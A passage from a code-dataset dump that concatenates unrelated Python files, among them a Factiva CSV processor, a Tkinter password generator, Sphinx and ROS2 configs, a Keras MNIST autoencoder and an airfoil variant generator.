"Les Echos.fr": "www.lesechos.fr/",
"La Provence": "www.laprovence.com",
"La Nouvelle République Dimanche": "www.lanouvellerepublique.fr",
"Ouest France": "www.ouest-france.fr",
"L'Est Républicain": "www.estrepublicain.fr",
"Le Figaro Premium": "plus.lefigaro.fr/tag/figaro-premium",
"Enjeux Les Echos": "www.lesechos.fr"
}
# site:domain.com/path ("titre article 1" OR "titre article 2")
filepath = "factiva_fr_final.csv"
# filepath = "small_extract.csv"
media = set()
csv_HP = []
with open('article_with_AN_FR.csv', 'w', newline='', encoding="utf-8") as new_csv:
with open(filepath, encoding="utf-8") as csv_file:
csv_reader = csv.reader(csv_file, delimiter=",")
csv_writer = csv.writer(new_csv, delimiter=",")
first_row = ["title", "date", "media", "homepage", "AN"]
csv_writer.writerow(first_row)
next(csv_reader) #let the first line
for line in tqdm(csv_reader, total=770967):
try:
newline = []
AN = line[15].split(" ")[1]
newline.extend([line[3], line[8], line[25], dic_homepage[line[25]], AN])
csv_writer.writerow(newline)
except:
print("could not find",line[25],"in the dictionnary")
print(csv_writer)
|
py | 7dfced640e013f0455860f5f365970ead6f25578 | import _tkinter
from string import punctuation, ascii_letters, digits
import random
import tkinter as tk
from tkinter import messagebox
root=tk.Tk()
def create_passw(length):
try:
length=int(length)
all=punctuation+ascii_letters+digits
secure_random=random.SystemRandom()
password="".join(secure_random.choice(all) for i in range(length))
e2.insert (10, password)
except ValueError:
e2.insert(10, "Enter Numeric Value !")
def clear():
e1.delete(0,tk.END)
e2.delete(0,tk.END)
def exit():
ex = messagebox.askyesno ("Password Generator", "Confirm if you want to exit")
if ex > 0:
root.quit ()
return
root.geometry('600x350+0+0')
root.configure(bg='violet')
try:
photo = tk.PhotoImage (file="key.ico")
root.iconphoto (False, photo)
except _tkinter.TclError:
pass
size=tk.StringVar()
L1=tk.Label(root,text="PASSWORD GENERATOR",font=('arial',20,'bold','underline'),bg='violet')
L1.grid(row=0, column=0)
L2=tk.Label(root,text="Enter the Length of intended password:",font=('lucida handwriting',10),bg='violet')
L2.grid(row=3, column=0)
e1=tk.Entry(root,text=size)
e1.grid(row=3, column=1)
b1=tk.Button(root,text="PASSWORD =",command=lambda:create_passw(e1.get()))
b1.grid(row=4, column=0,padx=10,pady=1)
e2=tk.Entry(root)
e2.grid(row=4, column=1)
b2=tk.Button(root,text="CLEAR",command=lambda:clear())
b2.grid(row=5, column=0,padx=10,pady=10)
b3=tk.Button(root,text="EXIT",command=lambda:exit())
b3.grid(row=5, column=1,padx=10,pady=10)
root.mainloop()
|
py | 7dfced6825ba436851eda679d4ad59407172e202 | import streamlit as st
from PIL import Image, ImageDraw
import numpy as np
import io
from typing import Tuple
DEMO_IMAGE = "test-images/smart_meter.jpg"
RED = (255, 0, 0) # For objects within the ROI
DEFAULT_ROI_Y_MIN = 0.0
DEFAULT_ROI_Y_MAX = 1.0
DEFAULT_ROI_X_MIN = 0.0
DEFAULT_ROI_X_MAX = 1.0
st.sidebar.title("ROI")
ROI_X_MIN = st.sidebar.slider("x_min", 0.0, 1.0, DEFAULT_ROI_X_MIN)
ROI_Y_MIN = st.sidebar.slider("y_min", 0.0, 1.0, DEFAULT_ROI_Y_MIN)
ROI_X_MAX = st.sidebar.slider("x_max", 0.0, 1.0, DEFAULT_ROI_X_MAX)
ROI_Y_MAX = st.sidebar.slider("y_max", 0.0, 1.0, DEFAULT_ROI_Y_MAX)
ROI_TUPLE = (
ROI_Y_MIN,
ROI_X_MIN,
ROI_Y_MAX,
ROI_X_MAX,
)
def draw_box(
draw: ImageDraw,
box: Tuple[float, float, float, float],
img_width: int,
img_height: int,
text: str = "",
color: Tuple[int, int, int] = (255, 255, 0),
) -> None:
"""
Draw a bounding box on and image.
The bounding box is defined by the tuple (y_min, x_min, y_max, x_max)
where the coordinates are floats in the range [0.0, 1.0] and
relative to the width and height of the image.
For example, if an image is 100 x 200 pixels (height x width) and the bounding
box is `(0.1, 0.2, 0.5, 0.9)`, the upper-left and bottom-right coordinates of
the bounding box will be `(40, 10)` to `(180, 50)` (in (x,y) coordinates).
"""
line_width = 10
y_min, x_min, y_max, x_max = box
(left, right, top, bottom) = (
x_min * img_width,
x_max * img_width,
y_min * img_height,
y_max * img_height,
)
draw.line(
[(left, top), (left, bottom), (right, bottom), (right, top), (left, top)],
width=line_width,
fill=color,
)
st.title("Integration config helper app")
st.text("This app is to help determine the ROI config for your image processing integration")
st.text("Upload an image from your camera and adjust the sliders to outline the text you wish to capture")
img_file_buffer = st.file_uploader("Upload an image", type=["png", "jpg", "jpeg"])
if img_file_buffer is not None:
pil_image = Image.open(img_file_buffer)
else:
pil_image = Image.open(DEMO_IMAGE)
draw = ImageDraw.Draw(pil_image)
draw_box(
draw,
ROI_TUPLE,
pil_image.width,
pil_image.height,
color=RED,
)
st.text('Top left is (x=0, y=0), bottom left is (x=0, y=1), bottom right is (x=1, y=1)')
st.image(
pil_image, use_column_width=True,
)
config_yaml = f"""
roi_x_min: {ROI_X_MIN} \n
roi_x_max: {ROI_X_MAX} \n
roi_y_min: {ROI_Y_MIN} \n
roi_y_max: {ROI_Y_MAX} \n
"""
st.write('The roi values to enter in your integration config are:')
st.markdown(config_yaml, unsafe_allow_html=True) |
py | 7dfcef427f2aefeaf931cee2ff87efc936db4537 | from django.urls import path
from . import views
urlpatterns = [
# API
path('', views.retrieve_all_public_posts_on_local_server, name='post_index'),
path('<str:post_id>/', views.retrieve_single_post_with_id, name='post'),
path('<str:post_id>/comments/', views.comments_retrieval_and_creation_to_post_id, name="get_or_add_comment"),
#Internal use only
path("fetch_public_posts", views.fetch_public_posts_from_nodes),
path("proxy_image/<path:image_url>", views.proxy_foreign_server_image, name='proxy_image')
] |
py | 7dfcefb5bedfa4e6ff971a03eee0ea2b6cdb8759 | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from ....testing import assert_equal
from ..surface import MergeModels
def test_MergeModels_inputs():
input_map = dict(Model1=dict(argstr='%s',
position=-3,
),
Model2=dict(argstr='%s',
position=-2,
),
ModelOutput=dict(argstr='%s',
hash_files=False,
position=-1,
),
args=dict(argstr='%s',
),
environ=dict(nohash=True,
usedefault=True,
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
terminal_output=dict(nohash=True,
),
)
inputs = MergeModels.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_MergeModels_outputs():
output_map = dict(ModelOutput=dict(position=-1,
),
)
outputs = MergeModels.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
|
py | 7dfceffa99fee0d71c65e04b36df493ce2c79d8f | from glob import glob
from pathlib import Path
LINE_SEP = "\n"
def to_css_attr(url):
return url.replace("*://", "").replace("*.", ".").replace("/*", "")
def to_google(url):
return f'google.*##.g:has(a[href*="{to_css_attr(url)}"])'
def to_duckduckgo(url):
return f'duckduckgo.*##.results > div:has(a[href*="{to_css_attr(url)}"])'
def to_brave(url):
return f'search.brave.com###results > div:has(a[href*="{to_css_attr(url)}"])'
def to_startpage(url):
return f'startpage.com##.w-gl__result:has(a[href*="{to_css_attr(url)}"])'
def main():
root_path = Path(__file__).parent.joinpath("../")
dist_path = root_path.joinpath("dist")
tmp_txt = dist_path.joinpath("tmp.txt")
g_all = dist_path.joinpath("google", "all.txt")
d_all = dist_path.joinpath("duckduckgo", "all.txt")
gd_all = dist_path.joinpath("google_duckduckgo", "all.txt")
b_all = dist_path.joinpath("brave", "all.txt")
sp_all = dist_path.joinpath("startpage", "all.txt")
for f in [g_all, d_all, gd_all, b_all, sp_all]:
f.parent.mkdir(parents=True, exist_ok=True)
with g_all.open("w") as g_all, \
d_all.open("w") as d_all, \
gd_all.open("w") as gd_all, \
b_all.open("w") as b_all, \
sp_all.open("w") as sp_all:
for file in root_path.joinpath("data").glob("*.txt"):
filename = file.name.split(".")[0]
# Sort and find duplicates
with file.open("r") as i, tmp_txt.open("w") as tmp:
already_in = set()
for line in i:
if line.startswith("!") or not line.strip():
tmp.write(line)
continue
url = line.strip()
if url in already_in:
print(f"Find duplicate: {url}. Skip!")
continue
else:
already_in.add(url)
tmp.write(line)
tmp_txt.replace(file)
with dist_path.joinpath("google", f"{filename}.txt").open("w") as g, \
dist_path.joinpath("duckduckgo", f"{filename}.txt").open("w") as d, \
dist_path.joinpath("google_duckduckgo", f"{filename}.txt").open("w") as gd, \
dist_path.joinpath("brave", f"{filename}.txt").open("w") as b, \
dist_path.joinpath("startpage", f"{filename}.txt").open("w") as sp, \
file.open("r") as i:
for line in i:
if line.startswith("!") or not line.strip():
continue
url = line.strip()
for f in [
g, g_all,
d, d_all,
gd, gd_all,
b, b_all,
sp, sp_all
]:
f.write(url + LINE_SEP)
url_google = to_google(url)
url_duckduckgo = to_duckduckgo(url)
url_brave = to_brave(url)
url_sp = to_startpage(url)
for f in [
g, g_all,
gd, gd_all
]:
f.write(url_google + LINE_SEP)
for f in [
d, d_all,
gd, gd_all
]:
f.write(url_duckduckgo + LINE_SEP)
for f in [
b, b_all
]:
f.write(url_brave + LINE_SEP)
for f in [
sp, sp_all
]:
f.write(url_sp + LINE_SEP)
if __name__ == "__main__":
main() |
py | 7dfcf02074e61c87bae35f30119dc90806eff293 | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
import json
import os
import sys
from datetime import date
from os import path
def read(filename):
here = path.dirname(path.abspath(__file__))
with open(path.join(here, filename)) as fd:
return fd.read()
def find_version(filename):
"""
Find package version in file.
"""
import re
content = read(filename)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", content, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
# print('current path', path.abspath('.'))
sys.path.insert(0, path.abspath("../.."))
# print(sys.path)
# -- Project information -----------------------------------------------------
project = "CogDL"
years = "2019-{}".format(date.today().year)
author = "CogDL Team, KEG"
copyright = "{}, {}".format(years, author)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
__version__ = find_version("../../cogdl/__init__.py")
# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autosummary",
"sphinx.ext.autodoc",
"sphinx.ext.doctest",
"sphinx.ext.intersphinx",
"sphinx.ext.todo",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.ifconfig",
"sphinx.ext.viewcode",
"sphinx.ext.githubpages",
"sphinx.ext.napoleon",
"recommonmark",
"sphinx_markdown_tables",
]
# generate autosummary pages
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = [".rst", ".md"]
# source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "CogDLdoc"
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [(master_doc, "CogDL.tex", "CogDL Documentation", "KEG", "manual")]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "cogdl", "CogDL Documentation", [author], 1)]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"CogDL",
"CogDL Documentation",
author,
"CogDL",
"One line description of project.",
"Miscellaneous",
)
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ["search.html"]
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {"https://docs.python.org/": None}
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
|
py | 7dfcf223d9941cc09c5cff19fb4f7679c74498ab | import os
import yaml
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch_ros.actions import Node
def generate_launch_description():
# load crazyflies
crazyflies_yaml = os.path.join(
get_package_share_directory('crazyswarm2'),
'config',
'crazyflies.yaml')
with open(crazyflies_yaml, 'r') as ymlfile:
crazyflies = yaml.safe_load(ymlfile)
# load crazyflie_types
crazyflies_types_yaml = os.path.join(
get_package_share_directory('crazyswarm2'),
'config',
'crazyflie_types.yaml')
with open(crazyflies_types_yaml, 'r') as ymlfile:
crazyflie_types = yaml.safe_load(ymlfile)
# construct motion_capture_configuration
motion_capture_yaml = os.path.join(
get_package_share_directory('crazyswarm2'),
'config',
'motion_capture.yaml')
with open(motion_capture_yaml, 'r') as ymlfile:
motion_capture = yaml.safe_load(ymlfile)
motion_capture_params = motion_capture["/motion_capture_tracking"]["ros__parameters"]
motion_capture_params["rigid_bodies"] = dict()
for key, value in crazyflies.items():
type = crazyflie_types[value["type"]]
motion_capture_params["rigid_bodies"][key] = {
"initial_position": value["initial_position"],
"marker": type["marker"],
"dynamics": type["dynamics"],
}
# construct crazyswarm2_server configuration
server_yaml = os.path.join(
get_package_share_directory('crazyswarm2'),
'config',
'crazyswarm2_server.yaml')
with open(server_yaml, 'r') as ymlfile:
server_params = yaml.safe_load(ymlfile)
server_params = server_params["/crazyswarm2_server"]["ros__parameters"]
server_params["crazyflies"] = crazyflies
server_params["crazyflie_types"] = crazyflie_types
# teleop params
teleop_yaml = os.path.join(
get_package_share_directory('crazyswarm2'),
'config',
'teleop.yaml')
return LaunchDescription([
Node(
package='motion_capture_tracking',
executable='motion_capture_tracking_node',
name='motion_capture_tracking',
output='screen',
parameters=[motion_capture_params]
),
Node(
package='crazyswarm2',
executable='teleop',
name='teleop',
# remappings=[
# ('takeoff', 'cf3/takeoff'),
# ('land', 'cf3/land'),
# ('cmd_vel', 'cf3/cmd_vel')
# ],
parameters=[teleop_yaml]
),
Node(
package='joy',
executable='joy_node',
name='joy_node',
),
Node(
package='crazyswarm2',
executable='crazyswarm2_server',
name='crazyswarm2_server',
output='screen',
parameters=[server_params]
),
])
|
py | 7dfcf2296cdb8af5d443a2317dbadfb77a876738 | import time
from matplotlib.lines import Line2D
import numpy as np
from vis.ScatterVisualizer import ScatterVisualizer
class Path2DVis(ScatterVisualizer):
class __Path2DVis(ScatterVisualizer):
"""
scatter-plot lines for shortes path-visualisation
"""
def __init__(self, xymin=-50,xymax=1100,
num_runs=1, offset=50,interactive=True, sleep_interval=0):
"""
:param xymin:
:param xymax: -> das is käse
:param num_runs:
:param offset:
:param interactive:
:param sleep_interval:
"""
super().__init__(interactive=interactive, xlim=0,
ylim=0, offset=offset, log_scale=False,
sexify=False)
self.set_yx_lim([xymin, xymax], [xymin, xymax])
self.num_runs = num_runs
self.sleep_interval = sleep_interval
self.my_plot.set_edgecolor('white')
def set_point_size(self, point_size=12.5):
"""
:param point_size:
:return:
"""
self.plot.set_sizes([point_size] * len(self.target_array))
def plot_path(self, x=[], y=[]):
"""
:param x:
:param y:
:return:
"""
self.ax.add_line(Line2D(x, y))
self.set_yx_lim([np.min(x) - self.offset, np.max(x) + self.offset],
[np.min(y) - self.offset, np.max(y) + self.offset])
# plt.savefig("/home/tobias/Bilder/tsp/path"+str(iteration)+".png")
self.fig.canvas.draw()
time.sleep(self.sleep_interval)
while True:
# bisschen unschoen.
try:
self.ax.lines[0].remove()
except IndexError:
break
instance = None
def __init__(self, xymin=-50, xymax=1100,
num_runs=1, offset=50, interactive=True, sleep_interval=0):
if not Path2DVis.instance:
Path2DVis.instance = Path2DVis.__Path2DVis(xymin,xymax,
num_runs, offset, interactive, sleep_interval)
def __getattr__(self, name):
return getattr(self.instance, name) |
py | 7dfcf32e60d5920d589951da37307e798f0735f0 | # coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 0.11.3725
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid.configuration import Configuration
class TransactionPrice(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'price': 'float',
'type': 'str'
}
attribute_map = {
'price': 'price',
'type': 'type'
}
required_map = {
'price': 'optional',
'type': 'optional'
}
def __init__(self, price=None, type=None, local_vars_configuration=None): # noqa: E501
"""TransactionPrice - a model defined in OpenAPI"
:param price:
:type price: float
:param type: The available values are: Price, Yield, Spread
:type type: str
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._price = None
self._type = None
self.discriminator = None
if price is not None:
self.price = price
if type is not None:
self.type = type
@property
def price(self):
"""Gets the price of this TransactionPrice. # noqa: E501
:return: The price of this TransactionPrice. # noqa: E501
:rtype: float
"""
return self._price
@price.setter
def price(self, price):
"""Sets the price of this TransactionPrice.
:param price: The price of this TransactionPrice. # noqa: E501
:type price: float
"""
self._price = price
@property
def type(self):
"""Gets the type of this TransactionPrice. # noqa: E501
The available values are: Price, Yield, Spread # noqa: E501
:return: The type of this TransactionPrice. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this TransactionPrice.
The available values are: Price, Yield, Spread # noqa: E501
:param type: The type of this TransactionPrice. # noqa: E501
:type type: str
"""
allowed_values = ["Price", "Yield", "Spread"] # noqa: E501
if self.local_vars_configuration.client_side_validation and type not in allowed_values: # noqa: E501
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
def to_dict(self, serialize=False):
"""Returns the model properties as a dict"""
result = {}
def convert(x):
if hasattr(x, "to_dict"):
args = getfullargspec(x.to_dict).args
if len(args) == 1:
return x.to_dict()
else:
return x.to_dict(serialize)
else:
return x
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
attr = self.attribute_map.get(attr, attr) if serialize else attr
if isinstance(value, list):
result[attr] = list(map(
lambda x: convert(x),
value
))
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], convert(item[1])),
value.items()
))
else:
result[attr] = convert(value)
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TransactionPrice):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, TransactionPrice):
return True
return self.to_dict() != other.to_dict()
|
py | 7dfcf4ec628a67da23e83dd71ddaa0e97e3f457b | # -*- coding: utf-8 -*-
# Copyright (c) 2018, VHRS and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestCandidateRegistration(unittest.TestCase):
pass
|
py | 7dfcf4ed98b0775474e898424b8de8c211ec99d2 | import pygame
from pygame_markdown.PygameMarkdown import MarkdownRenderer
# minimal pygame setup
pygame.init()
screenHeight = 900
screenWidth = 600
screen = pygame.display.set_mode((screenWidth, screenHeight))
pygame.display.set_caption("Pygame")
pygame.display.get_surface().fill((200, 200, 200)) # background coloring
# parameters
surface = pygame.display.get_surface() # get existing pygame window/screen
offset_X = 50 # offset from the left border of the pygame window
offset_Y = 20 # offset from the top border of the pygame window
textAreaHeight = 800
textAreaWidth = 500
mdfile_path = "README_test.md"
md = MarkdownRenderer()
md.set_markdown(mdfile_path)
md.set_area(surface, offset_X, offset_Y, textAreaWidth, textAreaHeight)
# OPTIONAL
#md.set_scroll_step(25)
#md.set_line_gaps(8, 35)
#md.set_font_sizes(28, 24, 20, 16, 16, 16)
md.set_font('Arial', 'CourierNew')
md.set_color_background(204, 204, 204)
md.set_color_code_background(42, 157, 143)
md.set_color_font(41, 50, 65)
md.set_color_hline(41, 50, 65)
#md.set_color_quote(41, 50, 65)
while True:
pygame.draw.rect(screen, (255,255, 255), (0, 0, screenWidth, screenHeight))
# get various input from pygame
pygame_events = pygame.event.get()
mouse_x, mouse_y = pygame.mouse.get_pos()
mouse_pressed = pygame.mouse.get_pressed()
for event in pygame_events: # handle QUIT operation
if event.type == pygame.QUIT:
pygame.quit()
exit()
md.color_font = (41, 50, 65)
md.display(pygame_events, mouse_x, mouse_y, mouse_pressed) # renders the markdown text onto the surface.
pygame.display.flip() # updates pygame window
|
py | 7dfcf58e148435f3b01281d89b3a507bfe899de8 | '''
Denoising Autoencoder on MNIST using Keras
keras 2.0.6
'''
import pandas as pd
import numpy as np
np.random.seed(1337) # for reproducibility
from keras import backend as K
from keras.models import Model
from keras.layers import Input, UpSampling2D
from keras.layers.convolutional import Conv2D, MaxPooling2D
from keras.callbacks import Callback, RemoteMonitor
from keras.utils import np_utils
from keras.utils.layer_utils import print_summary
# enable multi-CPU
import theano
theano.config.openmp = True
monitor = RemoteMonitor(root='http://localhost:9000')
# input image dimensions
img_rows, img_cols = 28, 28
batch_size = 128 # Number of images used in each optimization step
nb_classes = 10 # One class per digit
nb_epoch = 70 # Number of times the whole data is used to learn
# Read the train and test datasets
train = pd.read_csv("mnist/train.csv").values
test = train # output = input
print('train shape:', train.shape)
print('test shape:', test.shape)
# Reshape the data to be used by a Theano CNN. Shape is
# (nb_of_samples, nb_of_color_channels, img_width, img_heigh)
X_train = train[:, 1:].reshape(train.shape[0], 1, img_rows, img_cols)
X_test = test[:, 1:].reshape(test.shape[0], 1, img_rows, img_cols)
in_shape = (1, img_rows, img_cols)
print('in shape:', in_shape)
# Make the value floats in [0;1] instead of int in [0;255]
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
X_train /= 255
X_test /= 255
#Display the shapes to check if everything's ok
print('X_train shape:', X_train.shape)
print('X_test shape:', X_test.shape)
input_img = Input(shape=in_shape) # adapt this if using non `channels_first` image data format
x = Conv2D(16, kernel_size=(3,3), activation='relu', padding='same')(input_img)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(x)
x = MaxPooling2D((2, 2), padding='same')(x)
x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(x)
encoded = MaxPooling2D((2, 2), padding='same')(x)
# at this point the representation is (4, 4, 8) i.e. 128-dimensional
x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(encoded)
x = UpSampling2D((2, 2))(x)
x = Conv2D(8, kernel_size=(3,3), activation='relu', padding='same')(x)
x = UpSampling2D((2, 2))(x)
x = Conv2D(16, kernel_size=(3,3), activation='relu')(x)
x = UpSampling2D((2, 2))(x)
decoded = Conv2D(1, kernel_size=(3,3), activation='sigmoid', padding='same')(x)
autoencoder = Model(input_img, decoded)
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy')
print_summary(autoencoder)
autoencoder.fit(X_train, X_train,
epochs=50,
batch_size=128,
shuffle=True,
validation_data=(X_test, X_test))
|
py | 7dfcf75f437fca1d887d5979225c7c143f88dd8e | import matplotlib.pyplot as plt
import numpy as np
import scipy.interpolate as spln
import pyDOE as pd
import matplotlib.animation as anime
import sys
import Images_Generator as ig
import shutil
import os
"""
Airfoil_DataSet_Generator_Randomizer.py
---------------------------------------------
This program is used to create a full Database of airfoil variants based on the RAE-2822 airfoil.
The program requires from the user to enter the mother foil's data as an ASCII or UTF-8 text base format
along with its full directory and the target directory where all the data would be stored. An optional argument
is to enter '-v' after the obligatory arguments in order to get a visual representation of the Database
that was created.
This code shall be used only once per batch as there is no control over the random pattern ganeration
and any new results may not be the same as the old ones.
revision 1: Altered the text data export to facilitate the deformation of the grids and charged this
program with the duty of creating the proper data structure to hold the variants' .geom files
and their respective sdf format images. (6/2021)
Developed by Konstantinos Rekoumis 12/2020 (School of Naval and Marine Engineering NTUA)
"""
#------------- Functions definitions -----------------------------------
def randomizer_ControlPoints(tck,n):
#inputs are the knotvector , Control Points, the splines grade and the number of samples need to be created
kn=tck[0]
CP=np.array(tck[1])
k=tck[2]
s1 = pd.lhs(n,samples = 1)
s=[-0.2+0.4*x for x in s1[0,:]]
CP_temp = []
TCK = []
for i in range(n):
for j in range(len(CP[0])):
CP_temp.append((1+s[i])*CP[1,j])
TCK.append([kn,[CP[0,:],CP_temp],k])
CP_temp =[]
return TCK
def spline_fitting(points,samples,k=3,s=0):
# ------- B-spline preping ----------
tck,u = spln.splprep([points[:,0],points[:,1]],k=3,s=0)
# ----- Control Points Manipulation--------
CP = np.array(tck[1])
TCK=randomizer_ControlPoints(tck,samples)
# ------- B-splines fitting ----------
# u = np.linspace(0,1,100)
splines = [spln.splev(u,TCK[i]) for i in range(samples)]
return splines
def ran_plot(i):
if i<samples:
line1.set_ydata(up_sides[i][1])
line2.set_ydata(down_sides[i][1])
return line1, line2,
#----------------------------------------------------------------------------
if("__main__"==__name__):
#---------- Open the airfoil file for data entry ----------------------------
#------ RAE 2822 via Online data (Legacy still working tho) -----------------
# points_up = np.zeros((1,2),dtype="float")
# points_down = np.zeros((1,2),dtype="float")
# vv="down"
# samples = 500
# data = open("RAE_2822.txt")
# for line in data:
# if ('0' in line):
# bits=line.split(' ') #text separation
# bits[2]=bits[2].split('\n')[0] #newline char trim
# if (("0.000000" == bits[1]) & ("0.000000" == bits[2]) & (vv!="down")): vv ="down"
# elif(("0.000000" == bits[1]) & ("0.000000" == bits[2]) & (vv=="down")): vv ="up"
# if (vv == "up"):
# points_up=np.append(points_up,[[float(bits[1]),float(bits[2])]],axis=0)
# else:
# points_down=np.append(points_down,[[float(bits[1]),float(bits[2])]],axis=0)
#
# #getting rid of the zeros of the initialization
# points_up=np.delete(points_up,0,0)
# points_down=np.delete(points_down,0,0)
#------ RAE 2822 via mesh points sorting (New) --------------------------------
if (len(sys.argv)>=2):
input = sys.argv[1]
if(len(sys.argv)==3):
directory = sys.argv[2]
else:
print("Enter the Database destination directory:")
directory = input()
else:
print("Enter the Mother Foil\'s .geom file name:")
input = input()
points_up = np.zeros((1,2),dtype="float")
points_down = np.zeros((1,2),dtype="float")
vv="up"
samples = 1500
index = []
data = open(input,"r")
lines=data.readlines()
lines.pop(0)#first line usefull only for MaPFlow
for line in lines:
bits=line.split(" ")
index.append(bits[0])
if (points_up[-1,1]>0)and(float(bits[2])<0):vv="down"
if vv=="up":
points_up=np.append(points_up,[[float(bits[1]),float(bits[2])]],axis=0)
elif vv=="down":
points_down=np.append(points_down,[[float(bits[1]),float(bits[2])]],axis=0)
#appointing the spline end points
points_up=np.append(points_up,[[1.0,0.0]],axis=0)
points_down=np.append(points_down,[[0.0,0.0]],axis=0)
points_up=np.delete(points_up,0,0)
# points_down=np.delete(points_down,0,0)
up_sides=spline_fitting(points_up,samples)
down_sides=spline_fitting(points_down,samples)
#------------------------------------------------
# # ------ Visualising Area ------------
if (len(sys.argv)==4)and(sys.argv[3] == "-v"):
fig = plt.figure()
plt.plot(points_up[:,0],points_up[:,1],"ro")
plt.plot(points_down[:,0],points_down[:,1],"b*")
fig2 = plt.figure()
for i in range(samples):
plt.plot(up_sides[i][0],up_sides[i][1])
plt.plot(down_sides[i][0],down_sides[i][1])
fig1,ax=plt.subplots()
line1,=ax.plot(up_sides[0][0],up_sides[0][1])
line2,=ax.plot(down_sides[0][0],down_sides[0][1])
